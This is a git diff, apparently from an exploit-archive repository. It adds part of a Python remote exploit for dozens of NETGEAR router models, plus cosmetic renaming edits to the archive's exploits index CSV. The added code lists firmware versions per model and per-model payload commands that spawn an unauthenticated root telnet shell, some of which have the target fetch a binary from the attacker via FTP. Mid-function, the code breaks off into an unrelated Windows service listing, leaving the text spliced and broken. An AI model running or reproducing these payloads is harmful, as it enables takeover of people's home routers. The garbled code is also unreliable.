"V1.0.2.10_9.1.89" : "1.0.2.10", + "V1.0.2.6_9.1.87" : "1.0.2.6", + "V1.0.2.4_9.1.86" : "1.0.2.4", + "V1.0.2.2_9.1.84" : "1.0.2.2", + "V1.0.0.94_9.1.81" : "1.0.0.94", + "V1.0.0.90_9.1.79" : "1.0.0.90", + "V1.0.0.88_9.1.77" : "1.0.0.88", + "V1.0.0.82_8.0.71" : "1.0.0.82", + "V1.0.0.66_8.0.55" : "1.0.0.66", + }, + "WNDR4500" : { + "V1.0.1.46_1.0.76" : "1.0.1.46", + "V1.0.1.40_1.0.68" : "1.0.1.40", + "V1.0.1.38_1.0.64" : "1.0.1.38", + "V1.0.1.36_1.0.63" : "1.0.1.36", + "V1.0.1.20_1.0.40" : "1.0.1.20", + "V1.0.1.18_1.0.36" : "1.0.1.18", + "V1.0.1.6_1.0.24" : "1.0.1.6", + "V1.0.0.58_1.0.13" : "1.0.0.58", + "V1.0.0.50_1.0.12" : "1.0.0.50", + "V1.0.0.40_1.0.10" : "1.0.0.40", + }, + "WNDR4500V2" : { + 
"V1.0.0.72_1.0.45" : "1.0.0.72", + "V1.0.0.68_1.0.42" : "1.0.0.68", + "V1.0.0.64_1.0.40" : "1.0.0.64", + "V1.0.0.62_1.0.39" : "1.0.0.62", + "V1.0.0.60_1.0.38" : "1.0.0.60", + "V1.0.0.56_1.0.36" : "1.0.0.56", + "V1.0.0.54_1.0.33" : "1.0.0.54", + "V1.0.0.50_1.0.30" : "1.0.0.50", + "V1.0.0.42_1.0.25" : "1.0.0.42", + "V1.0.0.36_1.0.21" : "1.0.0.36", + "V1.0.0.26_1.0.16" : "1.0.0.26", + }, + "WNR834BV2" : { + "V2.1.13_2.1.13" : "2.1.13", + "V2.1.13_2.1.13NA" : "2.1.13NA", + "V2.0.8_2.0.8" : "2.0.8", + "V2.0.8_2.0.8NA" : "2.0.8NA", + "V1.0.32_1.0.32" : "1.0.32", + "V1.0.32_1.0.32NA" : "1.0.32NA", + }, + "WNR1000V3" : { + "V1.0.2.72_60.0.96" : "1.0.2.72", + "V1.0.2.72_60.0.96NA" : "1.0.2.72NA", + "V1.0.2.68_60.0.93" : "1.0.2.68", + "V1.0.2.68_60.0.93NA" : "1.0.2.68NA", + "V1.0.2.62_60.0.87" : "1.0.2.62", + "V1.0.2.62_60.0.87NA" : "1.0.2.62NA", + "V1.0.2.60_60.0.86WW" : "1.0.2.60", + "V1.0.2.60_60.0.86NA" : "1.0.2.60NA", + "V1.0.2.54_60.0.82" : "1.0.2.54", + "V1.0.2.54_60.0.82NA" : "1.0.2.54NA", + "V1.0.2.28_52.0.60" : "1.0.2.28", + "V1.0.2.28_52.0.60NA" : "1.0.2.28NA", + "V1.0.2.26_51.0.59" : "1.0.2.26", + "V1.0.2.26_51.0.59NA" : "1.0.2.26NA", + "V1.0.2.18_47.0.52" : "1.0.2.18", + "V1.0.2.18_47.0.52NA" : "1.0.2.18NA", + "V1.0.2.4_39.0.39" : "1.0.2.4", + }, + "WNR2000V2" : { + "V1.2.0.8_36.0.60" : "1.2.0.8", + "V1.2.0.8_36.0.60NA" : "1.2.0.8NA", + "V1.2.0.6_36.0.58" : "1.2.0.6", + "V1.2.0.6_36.0.58NA" : "1.2.0.6NA", + "V1.2.0.4_35.0.57" : "1.2.0.4", + "V1.2.0.4_35.0.57NA" : "1.2.0.4NA", + "V1.0.0.40_32.0.54" : "1.0.0.40", + "V1.0.0.40_32.0.54NA" : "1.0.0.40NA", + "V1.0.0.35_29.0.47" : "1.0.0.35", + "V1.0.0.34_29.0.45" : "1.0.0.34", + "V1.0.0.34_29.0.45NA" : "1.0.0.34NA", + }, + "WNR3500" : { + "V1.0.36_8.0.36NA" : "1.0.36NA", + "V1.0.30_8.0.30" : "1.0.30", + "V1.0.29_8.0.29NA" : "1.0.29NA", + "V1.0.22_6.0.22" : "1.0.22", + "V1.0.22_6.0.22NA" : "1.0.22NA", + "V1.0.15_1.0.15NA" : "1.0.15NA", + "V1.0.10_1.0.10NA" : "1.0.10NA", + }, + "WNR3500V2" : { + "V1.2.2.28_25.0.85" : 
"1.2.2.28", + "V1.2.2.28_25.0.85NA" : "1.2.2.28NA", + "V1.0.2.14_24.0.74" : "1.0.2.14", + "V1.0.2.14_24.0.74NA" : "1.0.2.14NA", + "V1.0.2.10_23.0.70" : "1.0.2.10NA", + "V1.0.2.10_23.0.70NA" : "1.0.2.10", + "V1.0.0.64_11.0.51" : "1.0.0.64", + "V1.0.0.64_11.0.51NA" : "1.0.0.64NA", + }, + "WNR3500L" : { + "V1.2.2.48_35.0.55NA" : "1.2.2.48NA", + "V1.2.2.44_35.0.53" : "1.2.2.44", + "V1.2.2.44_35.0.53NA" : "1.2.2.44NA", + "V1.2.2.40_34.0.48" : "1.2.2.40", + "V1.2.2.40_34.0.48NA" : "1.2.2.40NA", + "V1.2.2.30_34.0.37" : "1.2.2.30", + "V1.2.2.30_34.0.37NA" : "1.2.2.30NA", + "V1.0.2.50_31.1.25" : "1.0.2.50", + "V1.0.2.50_31.1.25NA" : "1.0.2.50NA", + "V1.0.2.26_30.0.98" : "1.0.2.26", + "V1.0.2.26_30.0.98NA" : "1.0.2.26NA", + "V1.0.0.88_13.0.76" : "1.0.0.88", + "V1.0.0.88_13.0.76NA" : "1.0.0.88NA", + "V1.0.0.86_13.0.75" : "1.0.0.86", + "V1.0.0.86_13.0.75NA" : "1.0.0.86NA", + }, + "WNR3500LV2" : { + "V1.2.0.56_50.0.96" : "1.2.0.56", + "V1.2.0.54_50.0.94" : "1.2.0.54", + "V1.2.0.50_50.0.90" : "1.2.0.50", + "V1.2.0.48_40.0.88" : "1.2.0.48", + "V1.2.0.46_40.0.86" : "1.2.0.46", + "V1.2.0.44_40.0.84" : "1.2.0.44", + "V1.2.0.40_40.0.80" : "1.2.0.40", + "V1.2.0.38_40.0.78" : "1.2.0.38", + "V1.2.0.34_40.0.75" : "1.2.0.34", + "V1.2.0.32_40.0.74" : "1.2.0.32", + "V1.2.0.28_40.0.72" : "1.2.0.28", + "V1.2.0.26_40.0.71" : "1.2.0.26", + "V1.2.0.20_40.0.68" : "1.2.0.20", + "V1.2.0.18_40.0.67" : "1.2.0.18", + "V1.2.0.16_40.0.66" : "1.2.0.16", + "V1.0.0.14_37.0.50" : "1.0.0.14", + "V1.0.0.10" : "1.0.0.10", + }, + "XR300" : { + "V1.0.3.38_10.3.30" : "1.0.3.38", + "V1.0.3.34_10.3.27" : "1.0.3.34", + "V1.0.3.26_10.3.22" : "1.0.3.26", + "V1.0.2.24_10.3.21" : "1.0.2.24", + "V1.0.2.18_10.3.15" : "1.0.2.18", + "V1.0.1.4_10.1.4" : "1.0.1.4", + }, +} + +# The default command, spawns a telnet daemon on TCP port 8888 (or 3333, when 8888 is already used) +default_commands = { + # These devices ask for a password if you don't specify the login program with -l + "AC1450" : "/bin/utelnetd -p8888 -l/bin/sh 
-d", + "D8500" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "DC112A" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "EX6200" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "EX7000" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6200V2" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6250" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6300V2" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6400" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6400V2" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6700" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6700V3" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6900" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R6900P" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R7000" : "/bin/utelnetd -p3333 -l/bin/sh -d", + "R7000P" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R7100LG" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R7300" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R7850" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R7900" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R8000" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R8300" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "R8500" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "RS400" : "/bin/utelnetd -p8888 -l/bin/sh -d", + "XR300" : "/bin/utelnetd -p8888 -l/bin/sh -d", + + # These devices don't need to create the terminal devices files first + "WGT624V4" : "telnetd -p8888 -l/bin/sh", + + # These devices need to create the terminal device files first + "D6220" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "D6300" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "D6400" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "D7000V2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "DGN2200" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod 
/dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "DGN2200M" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "DGN2200V4" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "DGND3700" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX3700" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX3800" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX3920" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX6000" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX6120" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX6130" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX6150" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "EX6920" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "LG2200D" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MBM621" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MBR624GU" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + 
"MBR1200" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MBR1515" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MBR1516" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MBRN3000" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "MVBR1210C" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "R4500" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "R6200" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "R6300" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WGR614V8" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WGR614V9" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888", + "WGR614V10" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WN2500RP" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WN2500RPV2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WN3100RP" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WN3500RP" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod 
/dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR3300" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR3300V2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR3400" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR3400V2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR3400V3" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR3700V3" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR4000" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR4500" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNDR4500V2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNR1000V3" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNR2000V2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNR3500L" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNR3500V2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh", + "WNR3500LV2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 
1; telnetd -p8888 -l/bin/sh",
+ "WNR834BV2" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh",
+
+ # On some versions of the EX6100, port 8888 is already used, so use 3333 instead
+ "EX6100" : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p3333 -l/bin/sh",
+
+ # Some devices need different commands based on the version
+ "WN3000RP" : collections.defaultdict(lambda : "mknod /dev/ptyp0 c 2 0; mknod /dev/ttyp0 c 3 0; mknod /dev/ptyp1 c 2 1; mknod /dev/ttyp1 c 3 1; telnetd -p8888 -l/bin/sh",
+ {"1.0.2.64" : "/usr/sbin/utelnetd -p8888 -l/bin/sh -d"}),
+
+ # The WNR3500/WGT624v4 don't have the device files or mknod, we'll have the victim download it
+ "WNCE3001" : "/usr/sbin/ftpc -f /tmp/mknod -s mknod -d LOCAL_IP_ADDRESS -u anonymous; chmod a+x /tmp/mknod; /tmp/mknod; telnetd -p8888 -l/bin/sh",
+ "WNR3500" : "/usr/sbin/ftpc -f /tmp/mknod -s mknod -d LOCAL_IP_ADDRESS -u anonymous; chmod a+x /tmp/mknod; /tmp/mknod; telnetd -p8888 -l/bin/sh",
+}
+
+# The default command on these devices needs to download mknod via FTP
+ftp_devices = {"WNR3500" : "arm_lsb", "WNCE3001" : "mips_msb"}
+
+###########################################################################
+## Functions ##############################################################
+###########################################################################
+
+def send(ip, port, is_https, payload, keep_open = False):
+ if is_https:
+ return send_ssl(ip, port, payload, keep_open)
+ else:
+ return send_plain(ip, port, payload, keep_open)
+
+def send_plain(ip, port, payload, keep_open):
+ sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+ sock.connect((ip, port))
+ sock.send(payload)
+ if keep_open:
+ return sock
+ sock.close()
+
+def send_ssl(ip, port, payload, keep_open):
+ import ssl
+ sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ wrappedSocket = ssl.wrap_socket(sock)
+ wrappedSocket.connect((ip, port))
+ wrappedSocket.send(payload)
+ if keep_open:
+ return wrappedSocket
+ wrappedSocket.close()
+
+def p32(address, model):
+ if model in big_endian_devices:
+ return struct.pack(">I", address)
+ return struct.pack("wmic service get name,pathname,startmode,StartName | findstr "10-Strike Bandwidth Monitor"
+Svc10StrikeBandMonitor C:\Program Files\10-Strike Bandwidth Monitor\BMsvc.exe Auto LocalSystem
+Svc10StrikeBMWD C:\Program Files\10-Strike Bandwidth Monitor\BMWDsvc.exe Auto LocalSystem
+Svc10StrikeBMAgent C:\Program Files\10-Strike Bandwidth Monitor Agent\BMAgent.exe Auto LocalSystem
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 486af450a..cc0ec866d 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -940,7 +940,7 @@ id,file,description,date,author,type,platform,port
 7986,exploits/windows/dos/7986.pl,"Free Download Manager 2.5/3.0 - Authorisation Stack Buffer Overflow (PoC)",2009-02-04,"Praveen Darshanam",dos,windows,
 7990,exploits/windows/dos/7990.py,"UltraVNC/TightVNC (Multiple VNC Clients) - Multiple Integer Overflows (PoC)",2009-02-04,"Andres Luksenberg",dos,windows,
 7995,exploits/windows/dos/7995.pl,"FeedMon 2.7.0.0 - outline Tag Buffer Overflow (PoC)",2009-02-05,"Praveen Darshanam",dos,windows,
-8008,exploits/hardware/dos/8008.txt,"NETGEAR SSL312 Router - Denial of Service",2009-02-09,Rembrandt,dos,hardware,
+8008,exploits/hardware/dos/8008.txt,"Netgear SSL312 Router - Denial of Service",2009-02-09,Rembrandt,dos,hardware,
 8013,exploits/hardware/dos/8013.txt,"Nokia N95-8 - '.jpg' Remote Crash (PoC)",2009-02-09,"Juan Yacubian",dos,hardware,
 8021,exploits/multiple/dos/8021.pl,"Squid < 3.1 5 - HTTP Version Number Parsing Denial of Service",2009-02-09,"Praveen Darshanam",dos,multiple,
 8024,exploits/windows/dos/8024.py,"TightVNC - Authentication Failure Integer Overflow (PoC)",2009-02-09,desi,dos,windows,
@@ -952,7 +952,7 @@ id,file,description,date,author,type,platform,port
 8091,exploits/multiple/dos/8091.html,"Mozilla Firefox 3.0.6 - BODY onload Remote Crash",2009-02-23,Skylined,dos,multiple,
 8099,exploits/windows/dos/8099.pl,"Adobe Acrobat Reader - JBIG2 Local Buffer Overflow (PoC) (2)",2009-02-23,"Guido Landi",dos,windows,
 8102,exploits/windows/dos/8102.txt,"Counter Strike Source ManiAdminPlugin 1.x - Remote Buffer Overflow (PoC)",2009-02-24,M4rt1n,dos,windows,
-8106,exploits/hardware/dos/8106.txt,"NETGEAR WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,dos,hardware,
+8106,exploits/hardware/dos/8106.txt,"Netgear WGR614v9 Wireless Router - Denial of Service",2009-02-25,staticrez,dos,hardware,
 8125,exploits/hardware/dos/8125.py,"HTC Touch - vCard over IP Denial of Service",2009-03-02,"Mobile Security Lab",dos,hardware,
 8129,exploits/windows/dos/8129.pl,"Novell eDirectory iMonitor - 'Accept-Language' Request Buffer Overflow (PoC)",2009-03-02,"Praveen Darshanam",dos,windows,
 8135,exploits/windows/dos/8135.pl,"Media Commands - '.m3u' / '.m3l' / '.TXT' / '.LRC' Local Heap Overflow (PoC)",2009-03-02,Hakxer,dos,windows,
@@ -1077,7 +1077,7 @@ id,file,description,date,author,type,platform,port
 8955,exploits/linux/dos/8955.pl,"LinkLogger 2.4.10.15 - 'syslog' Denial of Service",2009-06-15,h00die,dos,linux,
 8957,exploits/multiple/dos/8957.txt,"Apple Safari / QuickTime - Denial of Service",2009-06-15,"Thierry Zoller",dos,multiple,
 8960,exploits/linux/dos/8960.py,"Apple QuickTime - CRGN Atom Local Crash",2009-06-15,webDEViL,dos,linux,
-8964,exploits/hardware/dos/8964.txt,"NETGEAR DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",dos,hardware,
+8964,exploits/hardware/dos/8964.txt,"Netgear DG632 Router - Remote Denial of Service",2009-06-15,"Tom Neaves",dos,hardware,
 8971,exploits/windows/dos/8971.pl,"Carom3D 5.06 - Unicode Buffer Overrun/Denial of Service",2009-06-16,LiquidWorm,dos,windows,
 8976,exploits/multiple/dos/8976.pl,"Multiple HTTP Server - 'slowloris.pl' Low Bandwidth Denial of Service",2009-06-17,RSnake,dos,multiple,
 8982,exploits/linux/dos/8982.txt,"Compface 1.5.2 - '.xbm' Local Buffer Overflow (PoC)",2009-06-17,metalhoney,dos,linux,
@@ -2819,7 +2819,7 @@ id,file,description,date,author,type,platform,port
 22401,exploits/windows/dos/22401.php,"Microsoft Internet Explorer 9 - Memory Corruption Crash (PoC)",2012-11-01,"Jean Pascal Pereira",dos,windows,
 22402,exploits/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - 'WriteAV' Crash (PoC)",2012-11-01,coolkaveh,dos,windows,
 22406,exploits/linux/dos/22406.txt,"Konqueror 4.7.3 - Memory Corruption",2012-11-01,"Tim Brown",dos,linux,
-22407,exploits/hardware/dos/22407.txt,"NETGEAR ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",dos,hardware,
+22407,exploits/hardware/dos/22407.txt,"Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service",2003-03-21,"Paul Kurczaba",dos,hardware,
 22415,exploits/hardware/dos/22415.c,"3Com SuperStack II RAS 1500 - IP Header Denial of Service",2003-03-24,"Piotr Chytla",dos,hardware,
 22417,exploits/windows/dos/22417.py,"Kerio Personal Firewall 2.1.x - Remote Authentication Packet Buffer Overflow (1)",2003-04-28,"Core Security",dos,windows,
 22419,exploits/php/dos/22419.php,"PHP 4.3 - 'socket_iovec_alloc()' Integer Overflow",2003-03-25,"Sir Mordred",dos,php,
@@ -3560,7 +3560,7 @@ id,file,description,date,author,type,platform,port
 27764,exploits/linux/dos/27764.txt,"LibTiff 3.x - TIFFFetchData Integer Overflow",2006-04-28,"Tavis Ormandy",dos,linux,
 27765,exploits/linux/dos/27765.txt,"LibTiff 3.x - Double-Free Memory Corruption",2008-04-28,"Tavis Ormandy",dos,linux,
 27856,exploits/linux/dos/27856.txt,"GNU BinUtils 2.1x - Buffer Overflow",2006-05-11,"Jesus Olmos Gonzalez",dos,linux,
-27775,exploits/hardware/dos/27775.py,"NETGEAR ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",dos,hardware,
+27775,exploits/hardware/dos/27775.py,"Netgear ProSafe - Denial of Service",2013-08-22,"Juan J. Guelfo",dos,hardware,
 27778,exploits/linux/dos/27778.txt,"Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow",2013-08-22,x90c,dos,linux,139
 27790,exploits/osx/dos/27790.txt,"Apple Mac OSX 10.x - ImageIO OpenEXR Image File Remote Denial of Service",2006-05-01,Christian,dos,osx,
 27791,exploits/linux/dos/27791.txt,"Xine 0.99.x - Filename Handling Remote Format String",2006-05-01,KaDaL-X,dos,linux,
@@ -4110,7 +4110,7 @@ id,file,description,date,author,type,platform,port
 32551,exploits/linux/dos/32551.txt,"Dovecot 1.1.x - Invalid Message Address Parsing Denial of Service",2008-10-30,anonymous,dos,linux,
 32573,exploits/windows/dos/32573.txt,"Microsoft Windows Vista/2003 - 'UnhookWindowsHookEx' Local Denial of Service",2008-11-09,killprog.org,dos,windows,
 32581,exploits/multiple/dos/32581.txt,"Zope 2.11.2 - PythonScript Multiple Remote Denial of Service Vulnerabilities",2008-11-12,"Marc-Andre Lemburg",dos,multiple,
-32583,exploits/hardware/dos/32583.txt,"NETGEAR WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,dos,hardware,
+32583,exploits/hardware/dos/32583.txt,"Netgear WGR614 - Administration Interface Remote Denial of Service",2008-11-13,sr.,dos,hardware,
 32587,exploits/windows/dos/32587.txt,"VeryPDF PDFView - ActiveX Component Heap Buffer Overflow",2008-11-15,r0ut3r,dos,windows,
 32596,exploits/multiple/dos/32596.txt,"GeSHi 1.0.x - XML Parsing Remote Denial of Service",2008-11-20,"Christian Hoffmann",dos,multiple,
 32657,exploits/windows/dos/32657.py,"Nokia N70 and N73 - Malformed OBEX Name Header Remote Denial of Service",2008-12-12,NCNIPC,dos,windows,
@@ -10046,7 +10046,7 @@ id,file,description,date,author,type,platform,port
 40323,exploits/windows/local/40323.txt,"ZKTeco ZKAccess Professional 3.5.3 - Insecure File Permissions Privilege Escalation",2016-08-31,LiquidWorm,local,windows,
 40330,exploits/windows/local/40330.py,"FortiClient SSLVPN 5.4 - Credentials Disclosure",2016-09-01,"Viktor Minin",local,windows,
 40438,exploits/windows/local/40438.txt,"Glassfish Server - Unquoted Service Path Privilege Escalation",2016-09-28,s0nk3y,local,windows,
-40442,exploits/windows/local/40442.txt,"NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation",2016-09-30,Tulpa,local,windows,
